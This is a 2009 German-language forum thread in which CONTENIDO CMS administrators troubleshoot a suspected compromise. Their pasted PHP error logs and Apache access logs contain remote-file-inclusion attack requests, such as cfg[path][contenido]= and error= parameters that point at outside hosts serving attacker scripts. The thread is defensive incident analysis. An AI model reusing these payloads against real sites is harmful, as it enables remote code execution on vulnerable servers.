Contenido gehackt...

Fragen zur Installation von CONTENIDO 4.9? Probleme bei der Konfiguration? Hinweise oder Fragen zur Entwicklung des Systemes oder zur Sicherheit?
Antworten
GaMbIt_
Beiträge: 674
Registriert: Do 16. Mär 2006, 16:17
Kontaktdaten:
Kontaktdaten von GaMbIt_

Contenido gehackt...

Beitrag von GaMbIt_ » Mo 25. Mai 2009, 16:37

Ich hab heute einen komplettausfall einer Contenido Installation gehabt...

Bis jetzt weiss ich noch nichts genaues...
Ach ja.. es handelt sich um einen Windows 2003 Server Alle aktuellen Servce Packs, IIS 6, PHP5.1 irgendwas... MySQL 5.1.34 Community

Hier aber mal der Logfile nachdem ich das Backup eingespielt habe...
alled with no query pending in Module ID 50.
[25-May-2009 06:47:49] /projekt/cms/front_content.php?idcat=5/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 5/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??
[25-May-2009 06:47:49] /projekt/cms/front_content.php?idcat=5/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg?? next_record called with no query pending in Module ID 50.
[25-May-2009 06:48:47] /projekt/cms/front_content.php?idcat=5/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 5/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg??
[25-May-2009 06:48:47] /projekt/cms/front_content.php?idcat=5/errors.php?error=http://maehongson.nfe.go.th/budget3/image/id.jpg?? next_record called with no query pending in Module ID 50.
[25-May-2009 08:53:03] /projekt/cms/front_content.php?idcat=5%20%20/errors.php?error=http://geocities.com/coreto3/1.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?error=http://geocities.com/coreto3/1.txt??' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 5 /errors.php?error=http://geocities.com/coreto3/1.txt??
[25-May-2009 08:53:03] /projekt/cms/front_content.php?idcat=5%20%20/errors.php?error=http://geocities.com/coreto3/1.txt?? next_record called with no query pending in Module ID 50.
[25-May-2009 08:53:04] /projekt/cms/front_content.php?idcat=5%20%20/errors.php?error=http://geocities.com/coreto3/1.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?error=http://geocities.com/coreto3/1.txt??' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 5 /errors.php?error=http://geocities.com/coreto3/1.txt??
[25-May-2009 08:53:04] /projekt/cms/front_content.php?idcat=5%20%20/errors.php?error=http://geocities.com/coreto3/1.txt?? next_record called with no query pending in Module ID 50.
[25-May-2009 10:20:31] /projekt/cms/front_content.php?idcat=5%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.laxestereo.com/liverequest/req/copyright??? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 5 //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.laxestereo.com/liverequest/req/copyright???
[25-May-2009 10:20:31] /projekt/cms/front_content.php?idcat=5%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.laxestereo.com/liverequest/req/copyright??? next_record called with no query pending in Module ID 50.
[25-May-2009 10:37:55] /projekt/cms/front_content.php?idcat=5%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/gale232/id1.txt? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 5 //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/gale232/id1.txt?
[25-May-2009 10:37:55] /projekt/cms/front_content.php?idcat=5%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://h1.ripway.com/gale232/id1.txt? next_record called with no query pending in Module ID 50.
[25-May-2009 12:22:00] /projekt/cms/front_content.php?idcat=5%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sunggong.tv/shirohige/fxid.txt? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 5 //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sunggong.tv/shirohige/fxid.txt?
[25-May-2009 12:22:00] /projekt/cms/front_content.php?idcat=5%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.sunggong.tv/shirohige/fxid.txt? next_record called with no query pending in Module ID 50.
[25-May-2009 12:28:41] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 12:28:41] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 12:44:05] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 12:44:05] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 12:44:23] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 12:44:23] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 12:44:47] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 12:44:47] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 12:52:29] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 12:52:29] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 12:52:50] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 12:52:50] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 12:53:07] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 12:53:07] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 13:04:28] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 13:04:28] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 13:28:29] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 13:28:29] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 13:28:52] /front_content.php?idcat=85 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 13:28:52] /front_content.php?idcat=85 next_record called with no query pending in Module ID 68.
[25-May-2009 13:29:13] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 13:29:13] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 13:29:36] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 13:29:36] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 13:30:05] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 13:30:05] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 13:30:43] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 13:30:43] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 13:31:16] /front_content.php?idcatart=135<=1 MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND C.visible=1
AND C.public=1
ORDER by A.idtree' at line 11
SELECT * FROM
con_cat_tree AS A,
con_cat AS B,
con_cat_lang AS C
WHERE
A.idcat=B.idcat
AND B.idcat=C.idcat
AND C.idlang='1'
AND B.idclient='1'
AND B.parentid=
AND C.visible=1
AND C.public=1
ORDER by A.idtree
[25-May-2009 13:31:16] /front_content.php?idcatart=135<=1 next_record called with no query pending in Module ID 68.
[25-May-2009 13:43:20] /projekt/cms/front_content.php?idcat=67//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://www.angelcitytrading.com/css/1.txt? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 67//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.angelcitytrading.com/css/1.txt?
[25-May-2009 13:43:20] /projekt/cms/front_content.php?idcat=67//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://www.angelcitytrading.com/css/1.txt? next_record called with no query pending in Module ID 50.
[25-May-2009 13:50:00] PHP Fatal error: Maximum execution time of 30 seconds exceeded in C:\Inetpub\wwwroot\projekt\contenido\plugins\content_allocation\includes\functions.chains.php on line 31
[25-May-2009 14:36:56] PHP Fatal error: Maximum execution time of 30 seconds exceeded in C:\Inetpub\wwwroot\projekt\cms\front_content.php(981) : eval()'d code on line 404
[25-May-2009 14:41:59] PHP Fatal error: Maximum execution time of 30 seconds exceeded in C:\Inetpub\wwwroot\projekt\contenido\includes\pseudo-cron.inc.php on line 207
Nützliche Contenido Infos gibts hier: Contenido Wiki
Nach oben
GaMbIt_
Beiträge: 674
Registriert: Do 16. Mär 2006, 16:17
Kontaktdaten:
Kontaktdaten von GaMbIt_

Re: Contenido gehackt...

Beitrag von GaMbIt_ » Mo 25. Mai 2009, 16:39

Jede Datei wurde übrigens verändert...
Und ein
Eingefügt...
Nützliche Contenido Infos gibts hier: Contenido Wiki
Nach oben
GaMbIt_
Beiträge: 674
Registriert: Do 16. Mär 2006, 16:17
Kontaktdaten:
Kontaktdaten von GaMbIt_

Re: Contenido gehackt...

Beitrag von GaMbIt_ » Mo 25. Mai 2009, 16:49

Ach übrigens.. ist eine aktuelle Contenido 4.8.11 ohne AMR da Windows...
Nützliche Contenido Infos gibts hier: Contenido Wiki
Nach oben
GaMbIt_
Beiträge: 674
Registriert: Do 16. Mär 2006, 16:17
Kontaktdaten:
Kontaktdaten von GaMbIt_

Re: Contenido gehackt...

Beitrag von GaMbIt_ » Mo 25. Mai 2009, 17:31

Und noch was...
Nehmen wir diese eine Zeile...
[25-May-2009 10:20:31] /projekt/cms/front_content.php?idcat=5%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.laxestereo.com/liverequest/req/copyright??? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 5 //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.laxestereo.com/liverequest/req/copyright???
die Datei contenido/includes/include.newsletter_jobs_subnav.php gibt es nicht auf diesem System...

Irgendwie hab ich das Gefühl dass da irgendwo der Wurm drin ist...
Nützliche Contenido Infos gibts hier: Contenido Wiki
Nach oben
dreamdancer
Beiträge: 15
Registriert: Do 10. Jul 2008, 22:17
Kontaktdaten:
Kontaktdaten von dreamdancer

Re: Contenido gehackt...

Beitrag von dreamdancer » Mo 25. Mai 2009, 22:11

Hallo,

habe in unserem Contenido-Log in den letzten Tagen auch solche Einträge:
88.84.147.205 - - [20/May/2009:11:05:42 +0200] "GET /cms//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://aladin-online.com/new/components ... r/test.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
88.84.147.205 - - [20/May/2009:11:05:42 +0200] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://aladin-online.com/new/components ... r/test.txt??? HTTP/1.1" 200 12 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
205.234.185.80 - - [20/May/2009:11:17:54 +0200] "GET /cms//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
205.234.185.80 - - [20/May/2009:11:17:54 +0200] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 200 12 "-" "Mozilla/5.0"
205.234.185.80 - - [20/May/2009:11:17:54 +0200] "GET /cms/front_content.php?idcat=47&lang=1//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 200 8937 "-" "Mozilla/5.0"
205.234.185.80 - - [20/May/2009:11:24:50 +0200] "GET /cms/front_content.php?idcat=4&hellip;//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://www.angelcitytrading.com/css/1.txt? HTTP/1.1" 200 9646 "-" "Mozilla/5.0"
mit wechselnden IP-Adressen und wechselnden Ziel-Adressen.

Ausserdem noch solche Einträge:
85.177.149.196 - - [20/May/2009:09:50:52 +0200] "GET /cms/front_content.php?idcat=http://servicepack.sppages.com/index.htm? HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
85.177.149.196 - - [20/May/2009:09:50:52 +0200] "GET /cms/front_content.php?idcat=1&idart=132&lang=1 HTTP/1.1" 200 8206 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
und
92.72.95.6 - - [23/May/2009:00:40:43 +0200] "GET /cms/front_content.php?idcat=http://74.208.173.138:5553/index.html? HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
92.72.95.6 - - [23/May/2009:00:40:44 +0200] "GET /cms/front_content.php?idcat=1&idart=132&lang=1 HTTP/1.1" 200 8206 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
92.72.95.6 - - [23/May/2009:00:40:48 +0200] "GET /cms/front_content.php?idcat=http://74.208.173.138:5553/index.html? HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
92.72.95.6 - - [23/May/2009:00:40:48 +0200] "GET /cms/front_content.php?idcat=1&idart=132&lang=1 HTTP/1.1" 200 8206 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
Sind das wieder mal Angriffsversuche auf Contenido-Systeme?

Veränderte Dateien habe ich bei uns nicht gefunden. (Contenido 4.8.11)

Gruß Dreamdancer

http://www.autopark-ost-fichtner.de
Nach oben
Oldperl
Beiträge: 4254
Registriert: Do 30. Jun 2005, 22:56
Wohnort: Eltmann, Unterfranken, Bayern
Kontaktdaten:
Kontaktdaten von Oldperl

Re: Contenido gehackt...

Beitrag von Oldperl » Mi 27. Mai 2009, 10:45

dreamdancer hat geschrieben:habe in unserem Contenido-Log in den letzten Tagen auch solche Einträge:
Du bist dir aber sicher das es sich dabei um das Contenido-Log handelt? Sieht mir eher nach dem Apache Access-Log aus.
HTTP/1.1" 200 8937 "-" "Mozilla/5.0"
ist bedenklich, heißt nämlich das der Aufrufende die Datei erhalten hat ohne Fehler. Hier sollte man nach Contenido Version und nach der Art eines erfolgten Upgrades fragen, falls hier noch Dateileichen vorhanden sein sollten.
"GET /cms//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://aladin-online.com/new/components ... r/test.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
zeigt das es nur ein Versuch ist/war und dieser nicht erfolgreich war.
siehe :arrow: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html

Gruß aus Franken

Ortwin
ConLite 2.1, alternatives und stabiles Update von Contenido 4.8.x unter PHP 7.x - Download und Repo auf Gitport.de
phpBO Search Advanced - das Suchwort-Plugin für CONTENIDO 4.9
Mein Entwickler-Blog
Nach oben
dreamdancer
Beiträge: 15
Registriert: Do 10. Jul 2008, 22:17
Kontaktdaten:
Kontaktdaten von dreamdancer

Re: Contenido gehackt...

Beitrag von dreamdancer » Mi 27. Mai 2009, 13:40

Hallo Oldperl,

war natürlich das Log von Apache.

Die Anfragen auf "contenido/includes/include.newsletter_jobs_subnav.php" mit der 200-er Meldung , bringen ein "Illegal Call" in der Antwort (wie beabsichtigt). Die Contenido-Version ist die 4.8.11 und die betroffenen Verzeichnisse werden beim Upgrade immer komplett durch die neuen ersetzt.

Dies scheint nach Tante Goggle wieder mal ein Versuch des Cross-Site-Scripting mit Ziel auf die Version 4.8.4 zu sein. Siehe auch http://secunia.com/advisories/30683/ (vom letzten Jahr).

Gruß Mario
Nach oben
GaMbIt_
Beiträge: 674
Registriert: Do 16. Mär 2006, 16:17
Kontaktdaten:
Kontaktdaten von GaMbIt_

Re: Contenido gehackt...

Beitrag von GaMbIt_ » Mi 27. Mai 2009, 13:45

88.84.147.205 - - [20/May/2009:11:05:42 +0200] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://aladin-online.com/new/components ... r/test.txt??? HTTP/1.1" 200 12 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"

noch erfolgreich... soso

mal den zweiten Eintrag ansehen... der ging wohl durch...
Nützliche Contenido Infos gibts hier: Contenido Wiki
Nach oben
dreamdancer
Beiträge: 15
Registriert: Do 10. Jul 2008, 22:17
Kontaktdaten:
Kontaktdaten von dreamdancer

Re: Contenido gehackt...

Beitrag von dreamdancer » Mi 27. Mai 2009, 14:23

Hallo GaMbIt,

eben diese Anfrage wird mit "Illegal Call" ausgeliefert. (Eben nochmal getestet).

http://www.autopark-ost-fichtner.de//co ... r/test.txt???

So wie es in der "include.newsletter_jobs_subnav.php" vorgesehen ist.

Gruß Mario
Nach oben
GaMbIt_
Beiträge: 674
Registriert: Do 16. Mär 2006, 16:17
Kontaktdaten:
Kontaktdaten von GaMbIt_

Re: Contenido gehackt...

Beitrag von GaMbIt_ » Mi 27. Mai 2009, 14:41

gut.. :)

Ich hab bis jetzt noch keine Idee wie die da reingekommen sein können...
Ich hab auch nur den HTTP State 200 gesehen...
Nützliche Contenido Infos gibts hier: Contenido Wiki
Nach oben
Antworten

Zurück zu „Allgemeine Themen“